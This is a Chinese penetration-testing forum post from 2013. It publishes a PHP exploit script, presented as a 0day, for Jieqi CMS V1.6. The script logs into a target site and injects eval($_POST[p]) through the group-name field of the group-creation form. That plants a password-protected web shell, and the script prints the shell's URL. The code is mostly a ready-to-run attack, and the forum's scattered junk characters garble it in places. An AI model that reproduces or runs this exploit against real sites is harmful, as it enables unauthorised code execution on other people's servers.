找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 Jieqi(杰奇)CMS V1.6 PHP代码执行0day漏洞EXP
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2586|回复: 0
打印 上一主题 下一主题

Jieqi(杰奇)CMS V1.6 PHP代码执行0day漏洞EXP

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-2-23 11:28:09 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。  G1 M) c+ M: c1 N, j* [2 B
; z6 z7 }" U, W$ i6 {, |

! T" l5 h3 {( z! W3 Z( o7 x6 }该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。
  e% j! ~) j0 }- d 需要有一个能创建圈子的用户。
7 B5 @1 [: V! a  f& X! M
  Y( w! G0 L/ W2 p4 S<?php5 x, q, g- N" n6 [! m  k* c

; I; i0 Q, o- X. c$ X8 w* v( Nprint_r('  O3 [, B' u: W+ t! {
+---------------------------------------------------------------------------+  U7 l( J( h1 @. M6 u# A
Jieqi CMS V1.6 PHP Code Injection Exploit
: F9 F- b8 V! `" }; Aby flyh4t
" K% |; e7 r8 Imail: phpsec at hotmail dot com
! Q6 z- `& @2 `! t6 U: m  \" Cteam: http://www.wolvez.org
: @* |7 Q5 _6 X% M+---------------------------------------------------------------------------+
8 ~8 [6 V8 M8 E3 w, D3 \0 V- i" P'); /**) i/ X. o( b/ j  C: h* m
* works regardless of php.ini settings
; I) _  J4 H5 P* V+ o; \*/ if ($argc < 5) { print_r('$ w) L7 Q6 e( \: ]4 H9 p. [( Q
+---------------------------------------------------------------------------+( w8 L# M0 d2 x' l
Usage: php '.$argv[0].' host path username
7 t/ A" {( M1 X) E& ]host:      target server (ip/hostname)
- ?, [8 V* V, vpath:      path to jieqicms 7 M3 d) \+ H" T/ n9 _
uasename:  a username who can create group
) U# y$ i8 R' Y+ N: B9 CExample:
9 v- o& j/ s6 ?+ n6 F. U& Aphp '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password
( [; Z7 q# m& S6 W0 O: |+---------------------------------------------------------------------------+# P. _5 d: S9 W9 `( |' E$ j
'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /*get shell*/ $params ='-----------------------------23281168279961# n2 v: O! d: a) @9 y
Content-Disposition: form-data; name="gname"
1 b6 a8 r* w# |: `$ H( T $ L/ R) Q& s, f7 J, ~
'; $params .="';"; $params .='eval($_POST[p]);//flyh4t9 f% K6 J, `# e7 M( w: D
-----------------------------232811682799619 T; c; X4 `4 k) P. P' Y
Content-Disposition: form-data; name="gcatid"
/ J7 v9 `( _  e) K' N' n( G2 ~
- N, I, D, G1 W; r: ?- O1 J1; d$ y8 S/ X  [( C, K3 M
-----------------------------232811682799615 m3 b; L$ Y7 `( G, w/ S9 F
Content-Disposition: form-data; name="gaudit"
4 k/ @- `" ~& ~1 C/ f
! c: y7 N+ G& Q/ r- o+ t% C. H1
# O, Y7 J2 ?1 p0 l( j. _-----------------------------23281168279961
2 N$ n. x) ?# _Content-Disposition: form-data; name="gbrief"9 H) v' a* V, v0 a

9 i  S& @6 H& B8 |: u. j. [, V- t# N1
$ |0 [# W( m6 H) Q-----------------------------23281168279961--/ |" F# u* ^! g3 Y
'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs就是返回的内容 ob_clean(); www.2cto.com! c1 z, c# }! Z# I+ e
. R2 v# H  k6 J2 r
preg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url;
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表